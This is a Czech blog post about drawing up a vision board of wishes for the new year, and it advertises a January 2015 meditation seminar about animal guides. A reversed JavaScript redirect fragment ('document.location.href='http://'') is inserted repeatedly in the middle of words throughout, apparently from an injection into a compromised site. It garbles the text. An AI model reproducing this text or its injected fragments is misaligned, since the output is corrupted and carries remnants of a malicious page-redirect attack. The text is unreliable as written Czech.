meditace, seminář
Rainbow page separator

Vstup do nového roku trochu jinak…

Pátek, 9. ledna 2015

Většinou se začátkem nového roku mluvíme o různých předsevzetích a závazcích… S tím je však čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to spojen pocit, že něco musíme, že jde o něco, s čím se těžko vypořádáváme a tak také většinou dost rychle náš prvotní zápal pomine a náš záměr se rozplývá.

Můžeme [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to však zkusit ještě trochu jinak. Velice krásná je například tvorba vize, takového souboru přání, pro nastávající rok. Stačí si vzít papír a tužku, chvíli si sednout a nejlépe ničím nerušeni si sepsat přání, která chováme v srdci. Je pěkné si udělat čas a postupně si vytvořit takové malé dílko, můžeme si jej třeba i pomocí pastelek vybarvit a nakreslit (stačí symboly, nemusí jít o složité umělecké dílo :o). Další varian[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou je vzít si nůžky a časopisy a nalepit si z vystříhaných obrázků takovou koláž. Nebo lze zkombinovat vše dohromady. Fantazii se meze nekladou. Každá myšlenka má svou energii, každé naše vyslané přání se může začít plnit. Tím, že se zaměříme na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, po čem [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toužíme, že formulujeme [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, co si přejeme a chceme, se naše sny mohou začít zhmotňovat. Jakoby se něco „stane samo“. Nebo se nám jen mnohem lehčeji postupuje k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, co si chceme splnit.

Pokud nemáte doma dostatečný klid pro tvorbu vaší vize nebo chcete vaše přání ještě podpořit, pak jste srdečně zváni na seminář „Tvá cesta v novém roce se zvířecím průvodcem“ dne 15.1.2015 od 16:30 do DK Žďár, kde můžete využít naladění po společné meditaci a najít si navíc svého zvířecího průvodce (či [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totemové zvíře), které v novém roce zesílí vaše záměry a podpoří vaše kroky. Více na www.kvet-zivota.webnode.cz.